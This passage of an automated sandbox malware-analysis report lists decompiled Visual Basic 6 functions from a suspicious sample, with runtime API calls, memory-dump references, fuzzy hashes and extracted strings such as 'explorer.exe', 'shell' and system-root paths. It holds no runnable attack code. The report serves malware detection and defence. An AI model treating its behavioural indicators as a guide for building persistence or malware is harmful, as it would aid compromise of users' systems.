                                                                                    • #644.MSVBVM60(?), ref: 0041995D
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041996C
                                                                                    • #616.MSVBVM60(?,?), ref: 0041997A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419985
                                                                                    • __vbaFreeStr.MSVBVM60(004199D0), ref: 004199C9
                                                                                    • __vbaErrorOverflow.MSVBVM60(?), ref: 004199E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeMoveSystem$Ansi$#606#616#644BstrChkstkListOverflowUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3094200983-0
                                                                                    • Opcode ID: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
                                                                                    • Instruction ID: c4f5bd512d1b3bf9bc8ce298c4f3288c9308f79173eb6556b40925b4054b111f
                                                                                    • Opcode Fuzzy Hash: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
                                                                                    • Instruction Fuzzy Hash: 2B410FB5900249EFDB04DFE4DE49BDEBBB8EB48305F104669F601B72A0DB746A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004296C0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                    • __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
                                                                                      • Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
                                                                                      • Part of subcall function 004295B0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
                                                                                      • Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
                                                                                      • Part of subcall function 004295B0: __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
                                                                                      • Part of subcall function 004295B0: __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675
                                                                                    • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$AnsiFreeUnicode$Copy$#516#631ErrorList$BstrChkstkSystem
                                                                                    • String ID: boot$explorer.exe, $shell$yLb+$8
                                                                                    • API String ID: 913952100-2157437457
                                                                                    • Opcode ID: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
                                                                                    • Instruction ID: 6554cbec377a6d1fb2d016b249b8349fe5e87df9b4ee87d3b31f4120235b6aae
                                                                                    • Opcode Fuzzy Hash: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
                                                                                    • Instruction Fuzzy Hash: 9E311072910208EBCB05EF94DE58EDE7BB8FB48300F10812AF502B75A0DB745A48CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419F80 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #712.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FCC
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FD9
                                                                                    • #712.MSVBVM60(?,\\?\,00408114,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 00419FEE
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FF5
                                                                                    • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A00C
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A013
                                                                                    • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A02B
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A032
                                                                                    • #712.MSVBVM60(?,00409A70,00406544,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A047
                                                                                    • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A04E
                                                                                    • __vbaStrCopy.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A056
                                                                                    • __vbaFreeStr.MSVBVM60(0041A077,?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A070
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$#712Move$CopyFree
                                                                                    • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                    • API String ID: 2546659950-1311169778
                                                                                    • Opcode ID: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
                                                                                    • Instruction ID: d6e337f52aa0f406b5b9e7ae7ca613ada50fa9dc8b45b6b45c56035a55262318
                                                                                    • Opcode Fuzzy Hash: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
                                                                                    • Instruction Fuzzy Hash: 7F213771B502197BCB00DB54CD82FEFBBB9AB54714F20422AB211B72E4DAB45D458ED4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004174C3 Relevance: 27.1, APIs: 18, Instructions: 103COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$CopyUnlock$#616#631BstrErrorListSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1554985673-0
                                                                                    • Opcode ID: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
                                                                                    • Instruction ID: babe0322a797a5b6fd9da037fd94c9e8bb3a8b55dbd2c7b94b419f711927b1e7
                                                                                    • Opcode Fuzzy Hash: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
                                                                                    • Instruction Fuzzy Hash: A741A575A04114DFC724DFA4ED849EE77B9EF48300F10456BE505A3261DB785986CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041744B Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
                                                                                    • Instruction ID: 2258cb0996f04db46dac934d03965dd60a716a157fe6f4ee4cac8ab8ed0125e9
                                                                                    • Opcode Fuzzy Hash: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
                                                                                    • Instruction Fuzzy Hash: 73316EB1A00119DFCB14DFA4ED84DEE7B79EF88300F50856AE506E3261DB385986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00417469 Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
                                                                                    • Instruction ID: 1778df844528236c0a987ac4d2ed461284e935b427befae0ad271591413caba1
                                                                                    • Opcode Fuzzy Hash: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
                                                                                    • Instruction Fuzzy Hash: A13150B5A00119DFCB14DFA4ED84DEE7779EF88300F10856AE506E3261DB385986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004174E1 Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
                                                                                    • Instruction ID: f2cb84cfdc36a53c26a53c404fdd6523f55abe18ffc8f9b7dbfd1f77219752b6
                                                                                    • Opcode Fuzzy Hash: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
                                                                                    • Instruction Fuzzy Hash: FD315075A00119DFCB14DFA4ED94DEE7779EF88300B10456AE506E3261DB349986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041742D Relevance: 27.1, APIs: 18, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
